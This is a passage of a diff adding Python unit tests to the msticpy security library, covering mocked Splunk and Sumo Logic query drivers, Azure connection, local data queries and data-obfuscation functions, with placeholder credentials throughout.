+    sp_driver.connect(host="localhost", username="ian", password=_FAKE_STRING)  # nosec
+    check.is_true(sp_driver.connected)
+
+    check.is_instance(sp_driver._fired_alerts, pd.DataFrame)
+    for _, alert in sp_driver._fired_alerts.iterrows():
+        check.is_true(alert["name"].startswith("alert"))
+        check.equal(alert["count"], 10)
+
+
+@patch(SPLUNK_CLI_PATCH)
+def test_splunk_saved_searches(splunk_client):
+    """Check saved searches."""
+    splunk_client.connect = cli_connect
+    sp_driver = SplunkDriver()
+
+    # trying to get these before connecting should throw
+    with pytest.raises(MsticpyNotConnectedError) as mp_ex:
+        sp_driver._get_saved_searches()
+        check.is_false(sp_driver.connected)
+        check.is_none(sp_driver._saved_searches)
+    check.is_in("not connected to Splunk.", mp_ex.value.args)
+
+    # [SuppressMessage("Microsoft.Security", "CS002:SecretInNextLine", Justification="Test code")]
+    sp_driver.connect(host="localhost", username="ian", password=_FAKE_STRING)  # nosec
+    check.is_true(sp_driver.connected)
+
+    check.is_instance(sp_driver._saved_searches, pd.DataFrame)
+    for _, search in sp_driver._saved_searches.iterrows():
+        check.is_true(search["name"].startswith("query"))
+        check.equal(search["query"], "get stuff from somewhere")
+
+    queries, name = sp_driver.service_queries
+    check.equal(name, "SavedSearches")
+    check.is_instance(queries, dict)
+    for name, query in queries.items():
+        check.is_true(name.startswith("query"))
+        check.equal(query, "search get stuff from somewhere")
+
+
+@patch(SPLUNK_RESULTS_PATCH)
+@patch(SPLUNK_CLI_PATCH)
+def test_splunk_query_success(splunk_client, splunk_results):
+    """Check loaded true."""
+    splunk_client.connect = cli_connect
+    sp_driver = SplunkDriver()
+    splunk_results.ResultsReader = _results_reader
+
+    # trying to get these before connecting should throw
+    with pytest.raises(MsticpyNotConnectedError) as mp_ex:
+        sp_driver.query("some query")
+        check.is_false(sp_driver.connected)
+    check.is_in("not connected to Splunk.", mp_ex.value.args)
+
+    # [SuppressMessage("Microsoft.Security", "CS002:SecretInNextLine", Justification="Test code")]
+    sp_driver.connect(host="localhost", username="ian", password=_FAKE_STRING)  # nosec
+    check.is_true(sp_driver.connected)
+
+    df_result = sp_driver.query("some query")
+    check.is_instance(df_result, pd.DataFrame)
+    check.equal(len(df_result), 10)
+
+    response = sp_driver.query("zero query")
+    check.is_not_instance(response, pd.DataFrame)
+    check.equal(len(response), 0)
+
+
+# TODO - read config
+
+
+@pytest.mark.skip
+def test_live_connect():
+    """Use this to do live testing."""
+    sp_driver = SplunkDriver()
+    www = "splunk-mstic.westus2.cloudapp.azure.com"
+    # [SuppressMessage("Microsoft.Security", "CS002:SecretInNextLine", Justification="Test code")]
+    sp_driver.connect(host=www, port=8089, username="admin", password="***")  # nosec
+
+    query = """index="botsv2" earliest=08/25/2017:00:00:00 latest=08/26/2017:00:00:00
+    source="WinEventLog:Microsoft-Windows-Sysmon/Operational"
+    | table TimeCreated, host, EventID, EventDescription, User, process | head 10
+    """
+    res_df = sp_driver.query(query)
+    check.is_not_none(res_df)
+
+    query0 = """index="botsv2" earliest=08/25/2020:00:00:00
+    + 'source="WinEventLog:Microsoft-Windows-Sysmon/Operational"
+    | table TimeCreated, host, EventID, EventDescription, User, process | head 10
+    """
+    res_df = sp_driver.query(query0)
+    check.is_instance(res_df, list)
+    check.is_false(res_df)
+
+    query1 = """
+    index=blackhat sourcetype=network earliest=0 | table TimeGenerated, TotalBytesSent
+    """
+    res_df = sp_driver.query(query1)
+    check.is_not_none(res_df)
diff --git a/tests/data/drivers/test_sumologic_driver.py b/tests/data/drivers/test_sumologic_driver.py
new file mode 100644
index 000000000..f915009bb
--- /dev/null
+++ b/tests/data/drivers/test_sumologic_driver.py
@@ -0,0 +1,390 @@
+# -------------------------------------------------------------------------
+# Copyright (c) Microsoft Corporation. All rights reserved.
+# Licensed under the MIT License. See License.txt in the project root for
+# license information.
+# --------------------------------------------------------------------------
+"""datq query test class."""
+import io
+import json
+from datetime import datetime, timedelta
+from pathlib import Path
+from typing import Any, Dict
+from unittest.mock import MagicMock, patch
+
+import pandas as pd
+import pytest
+import httpx
+import pytest_check as check
+
+from msticpy.common.exceptions import (
+    MsticpyConnectionError,
+    MsticpyNotConnectedError,
+    MsticpyUserConfigError,
+    MsticpyUserError,
+)
+from msticpy.data.drivers.sumologic_driver import SumologicDriver
+
+from ...unit_test_lib import TEST_DATA_PATH
+
+# SUMOLOGIC_CLI_PATCH = SumologicDriver.__module__ + ".sp_client"
+# SUMOLOGIC_RESULTS_PATCH = SumologicDriver.__module__ + ".sp_results"
+SUMOLOGIC_SVC = SumologicDriver.__module__ + ".SumoLogic"
+
+# pylint: disable=too-many-branches, too-many-return-statements
+# pylint: disable=no-self-use, too-few-public-methods, protected-access
+
+
+def cli_connect(**kwargs):
+    """Return None if magic isn't == kql."""
+    cause = MagicMock()
+    cause.body = bytes("Test body stuff", encoding="utf-8")
+    cause.status = 404
+    cause.reason = "Page not found."
+    cause.headers = "One Two Three"
+    if kwargs.get("host") == "AuthError":
+        raise httpx.ConnectError("test AuthHeader")
+    if kwargs.get("host") == "HTTPError":
+        cause.body = io.BytesIO(cause.body)
+        raise httpx.HTTPError("test HTTPError")
+    return SumologicService()
+
+
+class SumologicService(MagicMock):
+    """Sumologic service mock."""
+
+    JOB_STATUS = {
+        "done_mssg": {"state": "DONE GATHERING RESULTS", "messageCount": 1},
+        "done_rec": {
+            "state": "DONE GATHERING RESULTS",
+            "messageCount": 1,
+            "recordCount": 10,
+        },
+        "cancelled": {"state": "CANCELLED"},
+        "waiting": {"state": "NO JOB"},
+        "pending": {"state": "PENDING"},
+    }
+
+    SEARCH_JOBS = {
+        "Wait": 1,
+        "Cancelled": 2,
+        "Timeout": 3,
+        "MessageSuccess": 21,
+        "MessageFail": 20,
+        "RecordSuccess": 31,
+        "RecordSuccess | limit 10": 31,
+        "RecordSuccess | count records": 32,
+        "RecordFail": 30,
+        "RecordFail | count records": 33,
+        "FailJob": 50,
+    }
+
+    def __init__(self, **kwargs):
+        """Mock method."""
+        super().__init__()
+        self._cli_connect(**kwargs)
+        self.status = self.JOB_STATUS["waiting"]
+        self.status_check_count = 0
+
+        self.data = pd.read_csv(Path(TEST_DATA_PATH).joinpath("host_logons.csv")).head(
+            10
+        )
+        self.data["map._count"] = 1
+
+    def _cli_connect(self, **kwargs):
+        if kwargs["endpoint"] == "AuthError":
+            raise httpx.ConnectError
+        if kwargs["endpoint"] == "HTTPError":
+            raise httpx.HTTPError
+        if kwargs["endpoint"] == "OtherError":
+            raise Exception()
+
+    def search_job(self, query, start_time, end_time, timezone, byreceipttime):
+        """Create a search job."""
+        del start_time, end_time, timezone, byreceipttime
+
+        self.status_check_count = 0
+        if query == "Failjob":
+            raise httpx.HTTPError("job failed")
+        return self.SEARCH_JOBS.get(query, 0)
+
+    def search_job_status(self, search_job):
+        """Return status of job."""
+        if search_job in (20, 21):
+            return self.JOB_STATUS["done_mssg"]
+        if search_job in (30, 31, 32, 33):
+            return self.JOB_STATUS["done_rec"]
+        if search_job < 10:
+            if self.status_check_count > 5:
+                self.status_check_count = 0
+                if search_job == self.SEARCH_JOBS["Wait"]:
+                    return self.JOB_STATUS["done_rec"]
+                if search_job == self.SEARCH_JOBS["Cancelled"]:
+                    return self.JOB_STATUS["cancelled"]
+            self.status_check_count += 1
+            return self.JOB_STATUS["pending"]
+
+        # You can manually set the status from the test.
+        return self.status
+
+    def search_job_records(self, searchjob, limit=None):
+        """Return the record results."""
+        del limit
+        # Need to implement a SL results object
+        if searchjob == self.SEARCH_JOBS["RecordSuccess | count records"]:
+            return {"records": self._to_json_dict(self.data)}
+        raise Exception("Record job failed")
+
+    def search_job_messages(self, searchjob, limit):
+        """Return the message results."""
+        del limit
+        if searchjob in (
+            self.SEARCH_JOBS["MessageSuccess"],
+            self.SEARCH_JOBS["Wait"],
+            self.SEARCH_JOBS["Cancelled"],
+        ):
+            return {"messages": self._to_json_dict(self.data.head(1))}
+        if searchjob == self.SEARCH_JOBS["RecordSuccess"]:
+            return {"messages": self._to_json_dict(self.data)}
+        raise Exception("Message job failed")
+
+    @staticmethod
+    def _to_json_dict(data):
+        return json.loads(data.to_json(orient="records"))
+
+
+@patch(SUMOLOGIC_SVC, SumologicService)
+def test_sumologic_connect_no_params():
+    """Check failure with no args."""
+    sumologic_driver = SumologicDriver()
+    check.is_true(sumologic_driver.loaded)
+
+    with pytest.raises(MsticpyUserConfigError) as mp_ex:
+        sumologic_driver.connect()
+    check.is_false(sumologic_driver.connected)
+    check.is_in("no Sumologic connection parameters", mp_ex.value.args)
+
+
+@patch(SUMOLOGIC_SVC, SumologicService)
+def test_sumologic_connect_req_params():
+    """Check load/connect success with required params."""
+    sumologic_driver = SumologicDriver()
+    check.is_true(sumologic_driver.loaded)
+
+    sumologic_driver.connect(
+        connection_str="https://api.us2.sumologic.com/api/v1",
+        accessid="***",
+        accesskey="***",
+    )  # nosec
+    check.is_true(sumologic_driver.connected)
+
+
+@patch(SUMOLOGIC_SVC, SumologicService)
+def test_sumologic_connect_errors():
+    """Check connect failure errors."""
+    sumologic_driver = SumologicDriver()
+    check.is_true(sumologic_driver.loaded)
+
+    print("connected", sumologic_driver.connected)
+    with pytest.raises(MsticpyConnectionError) as mp_ex:
+        sumologic_driver.connect(
+            connection_str="AuthError", accessid="***", accesskey="***"
+        )  # nosec
+        print("connected", sumologic_driver.connected)
+    check.is_false(sumologic_driver.connected)
+    check.is_in("Sumologic connection", mp_ex.value.args)
+    check.is_true(any(arg for arg in mp_ex.value.args if "Error" in arg))
+
+    sumologic_driver = SumologicDriver()
+    print("connected", sumologic_driver.connected)
+    with pytest.raises(MsticpyConnectionError) as mp_ex:
+        sumologic_driver.connect(
+            connection_str="HTTPError", accessid="***", accesskey="***"
+        )  # nosec
+        print("connected", sumologic_driver.connected)
+    check.is_false(sumologic_driver.connected)
+    check.is_in("Sumologic connection", mp_ex.value.args)
+    check.is_true(any(arg for arg in mp_ex.value.args if "Error" in arg))
+
+    sumologic_driver = SumologicDriver()
+    print("connected", sumologic_driver.connected)
+    with pytest.raises(MsticpyConnectionError) as mp_ex:
+        sumologic_driver.connect(
+            connection_str="OtherError", accessid="***", accesskey="***"
+        )  # nosec
+        print("connected", sumologic_driver.connected)
+    check.is_false(sumologic_driver.connected)
+    check.is_in("Sumologic connection", mp_ex.value.args)
+    check.is_true(any(arg for arg in mp_ex.value.args if "Error connecting" in arg))
+
+
+@patch(SUMOLOGIC_SVC, SumologicService)
+def test_sumologic_query_no_connect():
+    """Check query fails when not connected true."""
+    sumologic_driver = SumologicDriver()
+    # trying to get these before connecting should throw
+    with pytest.raises(MsticpyNotConnectedError) as mp_ex:
+        sumologic_driver.query("some query")
+    check.is_false(sumologic_driver.connected)
+    check.is_in("not connected to Sumologic.", mp_ex.value.args)
+
+
+@pytest.fixture
+@patch(SUMOLOGIC_SVC, SumologicService)
+def sumologic_drv():
+    """Return sumologic driver with short timeout."""
+    sumologic_driver = SumologicDriver()
+    sumologic_driver.checkinterval = 0.1
+    sumologic_driver.timeout = 1
+    sumologic_driver.connect(
+        connection_str="https://api.us2.sumologic.com/api/v1",
+        accessid="***",
+        accesskey="***",
+    )  # nosec
+    check.is_true(sumologic_driver.connected)
+    return sumologic_driver
+
+
+_QUERY_TESTS = [
+    ("Wait", 1),
+    ("Cancelled", 0),
+    ("MessageSuccess", 1),
+    ("MessageFail", "Failed to get job messages: Message job failed"),
+    ("RecordSuccess", 10),
+    ("RecordSuccess | count records", 10),
+    ("RecordFail", "Failed to get job messages: Message job failed"),
+    ("RecordFail | count records", "Failed to get search records: Record job failed"),
+    ("Timeout", 0),
+    ("Failjob", "Sumologic submit search_job"),
+]
+
+
+# pylint: disable=redefined-outer-name
+@patch(SUMOLOGIC_SVC, SumologicService)
+@pytest.mark.parametrize(("query", "expected"), _QUERY_TESTS)
+def test_sumologic_query(sumologic_drv, query, expected):
+    """Check queries with different outcomes."""
+    end = datetime.utcnow()
+    start = end - timedelta(1)
+    if query in ("MessageFail", "RecordFail", "Failjob", "RecordFail | count records"):
+        with pytest.raises(MsticpyConnectionError) as mp_ex:
+            df_result = sumologic_drv.query(
+                query, start=start, end=end, checkinterval=0.1, timeout=1, verbosity=4
+            )
+        check.is_in(expected, mp_ex.value.args)
+    else:
+        df_result = sumologic_drv.query(
+            query, start=start, end=end, checkinterval=0.1, timeout=1
+        )
+        check.is_instance(df_result, pd.DataFrame)
+        check.equal(len(df_result), expected)
+
+
+_TIMEOUT_PARAMS: Dict[str, Any] = {
+    "checkinterval": 0.1,
+    "timeout": 1,
+}
+
+_DEF_DATE_PARAMS: Dict[str, Any] = {
+    "start": datetime.utcnow() - timedelta(1),
+    "end": datetime.utcnow(),
+    **_TIMEOUT_PARAMS,
+}
+
+
+_PARAM_TESTS = [
+    pytest.param({"days": 5, **_TIMEOUT_PARAMS}, True, id="days"),
+    pytest.param(
+        {"start": datetime.utcnow() - timedelta(1), **_TIMEOUT_PARAMS}, True, id="start"
+    ),
+    pytest.param(_DEF_DATE_PARAMS, True, id="start/end"),
+    pytest.param(
+        {"start_time": datetime.utcnow() - timedelta(1), "end_time": datetime.utcnow()},
+        True,
+        id="start_time/end_time",
+    ),
+    pytest.param(
+        {
+            **_DEF_DATE_PARAMS,
+            "limit": 10,
+            "timezone": "PST",
+            "byreceipttime": True,
+        },
+        True,
+        id="other params",
+    ),
+    pytest.param(
+        {
+            **_DEF_DATE_PARAMS,
+            "normalize": False,
+        },
+        True,
+        id="no_normalize",
+    ),
+    pytest.param({**_DEF_DATE_PARAMS, "verbosity": 0}, True, id="verbosity0"),
+    pytest.param({**_DEF_DATE_PARAMS, "verbosity": 1}, True, id="verbosity1"),
+    pytest.param({**_DEF_DATE_PARAMS, "verbosity": 2}, True, id="verbosity2"),
+    pytest.param({**_DEF_DATE_PARAMS, "verbosity": 3}, True, id="verbosity3"),
+    pytest.param({**_DEF_DATE_PARAMS, "verbosity": 5}, True, id="verbosity5"),
+    pytest.param({}, False, id="no_date"),
+]
+
+
+@patch(SUMOLOGIC_SVC, SumologicService)
+@pytest.mark.parametrize("params, expected", _PARAM_TESTS)
+def test_sumologic_query_params(sumologic_drv, params, expected):
+    """Check queries with different parameters."""
+    if expected:
+        df_result = sumologic_drv.query("RecordSuccess", **params)
+        check.is_instance(df_result, pd.DataFrame)
+        check.equal(len(df_result), 10)
+    else:
+        with pytest.raises(MsticpyUserError) as mp_ex:
+            df_result = sumologic_drv.query("RecordSuccess", **params)
+        check.is_in("Missing parameter.", mp_ex.value.args)
+
+
+@patch(SUMOLOGIC_SVC, SumologicService)
+@pytest.mark.parametrize("ext", ("xlsx", "csv"))
+def test_sumologic_query_export(sumologic_drv, tmpdir, ext):
+    """Check queries with different parameters."""
+    exp_file = f"sumologic_test.{ext}"
+    f_path = tmpdir.join(exp_file)
+    params = {
+        "exporting": True,
+        "export_path": str(f_path),
+        "verbosity": 5,
+        **_DEF_DATE_PARAMS,
+    }
+    df_result = sumologic_drv.query("RecordSuccess", **params)
+    check.is_instance(df_result, pd.DataFrame)
+    check.equal(len(df_result), 10)
+    check.is_true(Path(f_path).is_file())
+
+
+# @pytest.mark.skip
+# def test_live_connect():
+#     """Use this to do live testing."""
+#     sumologic_driver = SumologicDriver()
+#     www = "https://api.us2.sumologic.com/api/v1"
+#     sumologic_driver.connect(url=www, accessid="***", accesskey="***")  # nosec
+
+#     query = """_index=botsv2 source="WinEventLog:Microsoft-Windows-Sysmon/Operational"
+#     | fields TimeCreated, host, EventID, EventDescription, User, process | head 10
+#     """
+#     res_df = sumologic_driver.query(
+#         query, start_time="2017-08-25T00:00:00", end_time="2017-08-26T00:00:00"
+#     )
+#     check.is_not_none(res_df)
+
+#     query0 = """_index=botsv2 source="WinEventLog:Microsoft-Windows-Sysmon/Operational"
+#     | fields TimeCreated, host, EventID, EventDescription, User, process | head 10
+#     """
+#     res_df = sumologic_driver.query(query0, start_time="2020-08-25T00:00:00")
+#     check.is_instance(res_df, list)
+#     check.is_false(res_df)
+
+#     query1 = """
+#     index=blackhat sourcetype=network earliest=0 | fields TimeGenerated, TotalBytesSent
+#     """
+#     res_df = sumologic_driver.query(query1)
+#     check.is_not_none(res_df)
diff --git a/tests/data/test_azuredata.py b/tests/data/test_azuredata.py
new file mode 100644
index 000000000..6e74d07cf
--- /dev/null
+++ b/tests/data/test_azuredata.py
@@ -0,0 +1,67 @@
+# -------------------------------------------------------------------------
+# Copyright (c) Microsoft Corporation. All rights reserved.
+# Licensed under the MIT License. See License.txt in the project root for
+# license information.
+# --------------------------------------------------------------------------
+from pathlib import Path
+from unittest.mock import patch
+
+import pytest
+from azure.identity import InteractiveBrowserCredential
+from msticpy.common import pkg_config
+from msticpy.common.azure_auth_core import (
+    AzCredentials,
+    ChainedTokenCredential,
+    CredentialWrapper,
+)
+from msticpy.common.provider_settings import get_provider_settings
+from msticpy.data.azure.azure_data import AzureData
+
+from ..unit_test_lib import custom_mp_config, get_test_data_path
+
+# pylint: disable=protected-access
+
+_TEST_DATA = get_test_data_path()
+
+
+def test_azure_init():
+    az = AzureData()
+    assert type(az) == AzureData
+
+
+@pytest.mark.skip
+def test_azure_connect_exp():
+    with pytest.raises(AttributeError):
+        az = AzureData()
+        az.connect()
+
+
+_AZ_CREDENTIALS = AzCredentials(
+    legacy=CredentialWrapper("credential"),
+    modern=ChainedTokenCredential(InteractiveBrowserCredential()),
+)
+
+
+@patch(AzureData.__module__ + ".SubscriptionClient")
+@patch(AzureData.__module__ + ".az_connect")
+def test_azure_connect(mock_creds, mock_sub_client):
+    mock_sub_client.return_value = "Client"
+    mock_creds.return_value = _AZ_CREDENTIALS
+    az = AzureData()
+    az.connect()
+    assert az.connected is True
+
+
+def test_get_config():
+    test_config1 = Path(_TEST_DATA).joinpath(pkg_config._CONFIG_FILE)
+    with custom_mp_config(test_config1):
+        data_provs = get_provider_settings(config_section="DataProviders")
+        az_cli_config = data_provs.get("AzureCLI")
+
+        assert bool(az_cli_config)
+        config_items = az_cli_config.args
+        assert bool(config_items)
+
+        assert bool(config_items["clientId"])
+        assert bool(config_items["tenantId"])
+        assert bool(config_items["clientSecret"])
diff --git a/tests/data/test_data_localdata.py b/tests/data/test_data_localdata.py
new file mode 100644
index 000000000..c7425bd68
--- /dev/null
+++ b/tests/data/test_data_localdata.py
@@ -0,0 +1,68 @@
+# -------------------------------------------------------------------------
+# Copyright (c) Microsoft Corporation. All rights reserved.
+# Licensed under the MIT License. See License.txt in the project root for
+# license information.
+# --------------------------------------------------------------------------
+"""Local data driver test class."""
+import unittest
+from pathlib import Path
+
+import pandas as pd
+
+from msticpy.data.data_providers import QueryProvider
+from ..unit_test_lib import get_test_data_path
+
+
+class TestLocalDataQuery(unittest.TestCase):
+    """Test class for local data provider."""
+
+    def test_create_provider(self):
+        """Test method."""
+        qry_prov = QueryProvider("LocalData")
+        qry_prov.connect()
+        self.assertTrue(qry_prov.connected)
+        queries = qry_prov.list_queries()
+        self.assertGreaterEqual(len(queries), 8)
+        self.assertIn("SecurityAlert.list_alerts", queries)
+        self.assertIn("WindowsSecurity.list_host_events", queries)
+        self.assertIn("Network.list_azure_network_flows_by_ip", queries)
+
+    def test_queries(self):
+        """Test method."""
+        data_path = Path(get_test_data_path()) / "localdata"
+        qry_prov = QueryProvider("LocalData", data_paths=[str(data_path)])
+
+        queries = qry_prov.list_queries()
+        for query in queries:
+            qry_func = getattr(qry_prov, query)
+            d_frame = qry_func()
+            self.assertIsInstance(d_frame, pd.DataFrame)
+            self.assertGreater(len(d_frame), 1)
+
+        schema = qry_prov.schema
+        for cols in schema.values():
+            self.assertIsInstance(cols, dict)
+            self.assertGreater(len(cols), 10)
+
+    def test_additional_queries(self):
+        """Test method."""
+        data_path = get_test_data_path()
+        query_path = str(Path(get_test_data_path()) / "localdata")
+        qry_prov = QueryProvider(
+            "LocalData", data_paths=[str(data_path)], query_paths=[query_path]
+        )
+        queries = qry_prov.list_queries()
+        self.assertGreaterEqual(len(queries), 11)
+
+        qry_params = {
+            "start": -1,
+            "end": 0,
+            "ip_address_list": ["test"],
+            "host_name": "test",
+            "account_name": "test",
+        }
+        for query in queries:
+            qry_func = getattr(qry_prov, query)
+            d_frame = qry_func(**qry_params)
+            self.assertIsInstance(d_frame, pd.DataFrame)
+            self.assertGreaterEqual(len(d_frame), 1)
diff --git a/tests/data/test_data_obfus.py b/tests/data/test_data_obfus.py
new file mode 100644
index 000000000..1fe96aa00
--- /dev/null
+++ b/tests/data/test_data_obfus.py
@@ -0,0 +1,228 @@
+# -------------------------------------------------------------------------
+# Copyright (c) Microsoft Corporation. All rights reserved.
+# Licensed under the MIT License. See License.txt in the project root for
+# license information.
+# --------------------------------------------------------------------------
+"""data obfuscation tests."""
+from collections import Counter
+from pathlib import Path
+from typing import Dict, Iterable
+
+import pandas as pd
+import pytest
+import pytest_check as check
+from msticpy.data import data_obfus
+
+from ..unit_test_lib import TEST_DATA_PATH
+
+
+_TEST_DATA: Dict[str, Iterable] = {
+    "hash_string": [("string", True), ("42424", True), (["42424"], True)],
+    "hash_item": [
+        (("no-delim", None), True),
+        (("one-delim", "-"), True),
+        (("mul.ti.del-im", "-.@"), True),
+        ((42424, "-.@"), False),
+    ],
+    "hash_ip": [
+        (42424, False),
+        ("192.168.1.2", True),
+        ("2a00:23c4:4780:ca00:90ab:c7fa:f451:de61", True),
+        (
+            [
+                "93.165.156.37",
+                "165.225.81.16",
+                "165.225.197.26",
+                "165.225.17.25",
+                "85.255.234.226",
+                "165.225.81.104",
+                "165.225.81.22",
+                "176.129.52.104",
+                "185.13.49.14",
+                "185.13.49.1",
+                "165.225.81.37",
+                "165.225.81.37",
+                "165.225.80.134",
+            ],
+            True,
+        ),
+        ("not_an_ip_192.168.1.2", True),
+        ("127.000.000.001", False),
+        ("0.0.0.0", False),  # nosec
+        ("10.1.23.456", True),
+        ("17.16.23.456", True),
+        ("17.1.23.456", True),
+        ("192.168.1.20", True),
+        ("1.1.1.1", True),
+    ],
+    "hash_list": [
+        (["a", "b", "c"], True),
+        (["a", "b", ["c", "d", "e"]], True),
+        (["a", {"b": "name"}, ["c", "d", "e"]], True),
+    ],
+    "hash_dict": [
+        ({"a": "name", "b": "noname"}, True),
+        ({"a": "name", "b": ["one", "two"]}, True),
+        ({"a": "name", "b": {1: "one", 2: "two"}}, True),
+    ],
+    "hash_sid": [
+        ("S-1-5-21-996632719-2361334927-4038480536-500", True),
+        ("S-1-5-18", False),
+        ("S-1-5-21-996632719-2361334927-4038480536-1066", True),
+        ("not-a-sid", False),
+    ],
+    "repl_uuid": [
+        ("b53bdbb0-d4ae-48b1-9b78-bc6cad35b95f", True),
+        ("c9275714-d709-45ae-afae-9edd756ee1a1", True),
+        ("efe2f687-0581-4726-887c-898855a66e39", True),
+        ("f93786b9-870f-4681-a4e7-2f81b10964a2", True),
+        ("352f9e97-7d04-4f2b-b27f-2d9625c78dd1", True),
+        ("be3d40b1-f317-4843-9010-a6cbe10dff00", True),
+    ],
+    "hash_account": [
+        ("NT AUTHORITY/SYSTEM", False),
+        ("someone@domain.com", True),
+        ("root", False),
+        ("CONTOSO\\my_admin", True),
+        ("NT AUTHORITY", False),
+        ("LOCAL SERVICE", False),
+        ("network service", False),
+        ("network disservice", True),
+    ],
+}
+
+
+@pytest.mark.parametrize("test_input, expected", _TEST_DATA["hash_string"])
+def test_hash_string(test_input, expected):
+    """Test basic hash string function."""
+    check.is_true((data_obfus.hash_string(test_input) != test_input) == expected)
+    if isinstance(test_input, str) and test_input.isnumeric():
+        check.is_true(data_obfus.hash_string(test_input).isnumeric())
+
+
+@pytest.mark.parametrize("test_input, expected", _TEST_DATA["hash_item"])
+def test_hash_item(test_input, expected):
+    """Test hash delimited function."""
+    test_str, delims = test_input
+    result = data_obfus.hash_item(test_str, delims)
+    check.is_true((result != test_str) == expected)
+    if isinstance(test_str, str) and delims:
+        delim_count = Counter(test_str)
+        result_count = Counter(result)
+        for delim in delims:
+            check.equal(delim_count[delim], result_count[delim])
+
+
+@pytest.mark.parametrize("test_input, expected", _TEST_DATA["hash_ip"])
+def test_hash_ip(test_input, expected):
+    """Test hash ip function."""
+    result = data_obfus.hash_ip(test_input)
+    if isinstance(test_input, list):
+        for orig_ip, hashed_ip in zip(test_input, result):
+            check.equal((orig_ip != hashed_ip), expected)
+    else:
+        check.equal((test_input != result), expected)
+
+    if not isinstance(test_input, str):
+        return
+    if test_input.startswith("10."):
+        check.is_true(result.startswith("10."))
+    if test_input.startswith("17.16."):
+        check.is_true(result.startswith("17.16."))
+    if test_input.startswith("17.1."):
+        check.is_false(result.startswith("17.1."))
+    if test_input.startswith("192.168"):
+        check.is_true(result.startswith("192.168"))
+    if test_input == "1.1.1.1":
+        check.is_true(len(set(result.split("."))) > 1)
+
+
+@pytest.mark.parametrize("test_input, expected", _TEST_DATA["hash_list"])
+def test_hash_list(test_input, expected):
+    """Test hash list function."""
+    result = data_obfus.hash_list(test_input)
+    for orig_ip, hashed_ip in zip(test_input, result):
+        check.equal(orig_ip != hashed_ip, expected)
+
+
+@pytest.mark.parametrize("test_input, expected", _TEST_DATA["hash_dict"])
+def test_hash_dict(test_input, expected):
+    """Test hash dict function."""
+    result = data_obfus.hash_dict(test_input)
+    for key in test_input:
+        check.equal(test_input[key] != result[key], expected)
+
+
+@pytest.mark.parametrize("test_input, expected", _TEST_DATA["hash_sid"])
+def test_hash_sid(test_input, expected):
+    """Test hash SID function."""
+    result = data_obfus.hash_sid(test_input)
+    check.equal(test_input != result, expected)
+
+    if test_input != result:
+        check.equal(test_input.split("-")[-1], result.split("-")[-1])
+
+
+@pytest.mark.parametrize("test_input, expected", _TEST_DATA["hash_account"])
+def test_hash_acct(test_input, expected):
+    """Test hash Account function."""
+    result = data_obfus.hash_account(test_input)
+    check.equal(test_input != result, expected)
+
+    if test_input != result:
+        check.is_in("account-#", result)
+
+
+@pytest.mark.parametrize("test_input, expected", _TEST_DATA["repl_uuid"])
+def test_hash_uuid(test_input, expected):
+    """Test hash UUI function."""
+    result = data_obfus.replace_guid(test_input)
+    check.equal(test_input != result, expected)
+
+    # test that source Guid maps onto same result
+    result2 = data_obfus.replace_guid(test_input)
+    check.equal(result, result2)
+
+
+def test_obfuscate_df():
+    """Test obfuscation on DataFrame."""
+    win_procs = pd.read_pickle(Path(TEST_DATA_PATH).joinpath("win_proc_test.pkl"))
+
+    out_df = data_obfus.mask_df(win_procs)
+
+    check.equal(len(out_df), len(win_procs))
+    for idx, row in win_procs.loc[:5].iterrows():
+        for mapped_col in win_procs.columns:
+            if data_obfus.OBFUS_COL_MAP.get(mapped_col) == "sid":
+                # SIDs can be unchanged if well-known SID
+                continue
+            if mapped_col in data_obfus.OBFUS_COL_MAP:
+                check.not_equal(row[mapped_col], out_df.loc[idx][mapped_col])
+            else:
+                check.equal(row[mapped_col], out_df.loc[idx][mapped_col])
+
+        comp_uc, comp_ch = data_obfus.check_masking(out_df, win_procs, index=idx)
+        n_changed = len(
+            [col for col in win_procs.columns if col in data_obfus.OBFUS_COL_MAP]
+        )
+        n_unchanged = len(win_procs.columns) - n_changed
+        # number of unchanged might be one less since some SIDs are not hashed
+        check.is_true(len(comp_uc) in [n_unchanged, n_unchanged + 1])
+        check.is_true(len(comp_ch) in [n_changed, n_changed - 1])
+
+
+def test_pandas_accessor():
+    """Test obfuscation with pandas accessor."""
+    win_procs = pd.read_pickle(Path(TEST_DATA_PATH).joinpath("win_proc_test.pkl"))
+
+    out_df = win_procs.mp_mask.mask()
+    check.equal(len(out_df), len(win_procs))
+    for idx, row in win_procs.loc[:2].iterrows():
+        for mapped_col in win_procs.columns:
+            if data_obfus.OBFUS_COL_MAP.get(mapped_col) == "sid":
+                # SIDs can be unchanged if well-known SID
+                continue
+            if mapped_col in data_obfus.OBFUS_COL_MAP:
+                check.not_equal(row[mapped_col], out_df.loc[idx][mapped_col])
+            else:
+                check.equal(row[mapped_col], out_df.loc[idx][mapped_col])
diff --git a/tests/data/test_dataqueries.py b/tests/data/test_dataqueries.py
new file mode 100644
index 000000000..65d755f4e
--- /dev/null
+++ b/tests/data/test_dataqueries.py
@@ -0,0 +1,461 @@
+# -------------------------------------------------------------------------
+# Copyright (c) Microsoft Corporation. All rights reserved.
+# Licensed under the MIT License. See License.txt in the project root for
+# license information.
+# --------------------------------------------------------------------------
+"""dataprovider query test class."""
+import contextlib
+import io
+import unittest
+import warnings
+from datetime import datetime
+from functools import partial
+from pathlib import Path
+from typing import Any, Dict, Iterable, Optional, Tuple, Union
+
+import pandas as pd
+import pytest_check as check
+from msticpy.common.exceptions import MsticpyException
+from msticpy.data.data_providers import DriverBase, QueryContainer, QueryProvider
+from msticpy.data.query_source import QuerySource
+
+from ..unit_test_lib import get_test_data_path
+
+_TEST_DATA = get_test_data_path()
+
+
+# pylint: disable=protected-access, invalid-name
+class UTDataDriver(DriverBase):
+    """Test class."""
+
+    _TEST_ATTRIB = "CustomAttrib"
+
+    def __init__(self, **kwargs):
+        """Initialize new instance."""
+        super().__init__(**kwargs)
+        self._kwargs = kwargs
+        self._loaded = True
+        self._connected = False
+        self.public_attribs = {"test": self._TEST_ATTRIB}
+        self.svc_queries = {}
+        self.has_driver_queries = True
+
+    def connect(self, connection_str: Optional[str] = None, **kwargs):
+        """Test method."""
+        del connection_str
+        self._connected = True
+
+    def query(
+        self, query: str, query_source: QuerySource = None, **kwargs
+    ) -> Union[pd.DataFrame, Any]:
+        """Test method."""
+        del query_source, kwargs
+        return pd.DataFrame(data=query, index=[0], columns=["query"])
+
+    def query_with_results(self, query: str, **kwargs) -> Tuple[pd.DataFrame, Any]:
+        """Test method."""
+        return (pd.DataFrame(data=query, index=[0], columns=["query"]), query)
+
+    @property
